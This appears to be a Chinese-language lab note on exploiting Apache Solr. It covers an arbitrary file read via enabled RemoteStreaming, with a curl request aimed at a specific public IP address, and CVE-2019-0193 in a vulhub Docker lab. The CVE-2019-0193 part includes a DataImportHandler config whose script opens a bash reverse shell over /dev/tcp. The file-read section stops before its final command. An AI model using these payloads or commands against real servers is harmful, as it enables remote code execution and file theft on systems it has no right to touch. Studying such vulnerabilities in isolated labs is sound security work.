Apache Solr是一个基于Java的开源搜索平台,用于实现高效、强大的全文检索和实时分析。它建立在Apache Lucene搜索引擎库的基础上,提供了丰富的功能和灵活的配置选项,适用于各种规模和类型的搜索应用。
抽象理解:
想象一家电子商务公司需要为其在线商店实现搜索功能。他们使用Apache Solr来索引和搜索产品目录,用户可以通过输入关键字快速查找产品,Solr支持实时更新和高度可定制的搜索结果排序,使得用户能够迅速准确地找到他们感兴趣的商品。
Solr 文件读取
版本是8.8.1
访问:http://127.0.0.1/solr/admin/cores?indexInfo=false&wt=json
首先,访问http://your-ip:8983/solr/admin/cores?indexInfo=false&wt=json获取数据库:获取数据库名,vulhub的数据库为demo
发送如下数据包,修改数据库demo的配置,开启RemoteStreaming:
curl -i -s -k -X $'POST' \
-H $'Content-Type: application/json' --data-binary $'{\"set-property\":{\"requestDispatcher.requestParsers.enableRemoteStreaming\":true}}' \
$'http://61.188.177.183:7490/solr/demo/config'
再通过stream.url读取任意文件:
Apache Solr CVE-2019-0193
ubuntu老出毛病,索性单独拉一个
docker pull vulhub/solr:8.1.1
创建一个新的目录来存放你的 Docker Compose 文件和数据目录
mkdir solr_setup
cd solr_setup
然后,创建一个 docker-compose.yml 文件,并将以下内容写入文件
version: '3.8'
services:
solr:
image: vulhub/solr:8.1.1
ports:
- "8983:8983"
volumes:
- ./solr_data:/opt/solr/server/solr/mycores
在该目录下运行以下命令启动 Solr 容器
docker-compose up -d
创建一个新的 Solr 核心
docker-compose exec solr bash bin/solr create_core -c test -d example/example-DIH/solr/db
这条命令会在名为 solr 的服务中执行 bin/solr create_core 命令,创建一个名为 test 的 Solr 核心,使用 example/example-DIH/solr/db 作为配置目录
这里报错的话,使用 -force 参数强制创建核心
Creating cores as the root user can cause Solr to fail and is not advisable. Exiting.
If you started Solr as root (not advisable either), force core creation by adding argument -force
在命令中添加 -force 参数来绕过这个警告并强制创建核心:
docker-compose exec solr bash bin/solr create_core -c test -d example/example-DIH/solr/db -force
<dataConfig>
<dataSource type="URLDataSource"/>
<script><![CDATA[
function poc(row){
var process= java.lang.Runtime.getRuntime();
process.exec(bash -c 'exec bash -i &>/dev/tcp/127.0.0.1/50060 <&1');
return row;
}
]]></script>
<document>
<entity name="stackoverflow"
url="https://stackoverflow.com/feeds/tag/solr"
processor="XPathEntityProcessor"
forEach="/feed"
transformer="script:poc" />
</document>
</dataConfig>
